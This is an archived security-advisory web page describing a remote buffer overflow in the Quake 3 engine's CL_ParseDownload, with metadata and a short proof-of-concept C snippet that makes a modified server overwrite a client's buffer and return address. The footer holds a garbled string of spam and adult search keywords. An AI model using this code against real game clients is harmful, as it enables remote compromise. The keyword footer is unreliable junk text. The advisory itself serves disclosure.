exploits , vulnerabilities , articles , Quake 3 Engine CL_ParseDownload Remote Buffer Overflow Vulnerability

Title	Quake 3 Engine CL_ParseDownload Remote Buffer Overflow Vulnerability
Published	2006-06-05-12:00AM
Updated	2006-06-05-10:47PM
Class	Boundary Condition Error
CVE
Remote	Yes
Local	No
Credit	Discovery is credited to Luigi Auriemma <aluigi@autistici.org>.
Vulnerable	id Software Quake 3 Arena 1.32c icculus.org Quake 3 0
Not Vulnerable	icculus.org Quake 3 revision 796
Code	The server may be modified to send data sufficient to demonstrate this issue. The following code should be added to the 'code/server/sv_client.c' source file, after the '// send the gamestate' command at approximately line 575: // send the gamestate int i; MSG_WriteByte( &msg, svc_download ); MSG_WriteShort( &msg, -1 ); // block != 0, for fast return MSG_WriteShort( &msg, 16384 + 32 ); // amount of bytes to copy for(i = 0; i < 16384; i++) { // overwrite the data buffer MSG_WriteByte(&msg, 0x00); // 0x00 for saving space } for(i = 0; i < 32; i++) { // do the rest of the job MSG_WriteByte(&msg, 'a'); // return address: 0x61616161 } SV_SendMessageToClient( &msg, client ); return;
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability
2009-12-14 Google Chrome DNS Pre-Fetching Proxy Cache Information Disclosure Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 09:46:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Crack+Data Very big w CMS is Fre hot++sex www sex oc www.jianfe 200 /compo koreansing com_mtree. 2.3.1 Ikonboard CMS is Fre video 3gp www sex oc broadcom Crack+Data oneadmin.h koreansing Www.Xxxx.C www.ahhwh. cisco trus 200 /compo video of c anjoli jol oneadmin.h www.c754.c sextoon.co com_phpsho lic office Fire-Soft- Popstars Sex egypt SonataServ Sex foto Dj cammy vuln/explo xlj123.com Arabsex.co www.sexgay bothsex Sex fuete Www.ArabSe Www.video. maxcpm.inf worldsex.c seximodle www.soupu. WWW.Sexto issue deta Video sex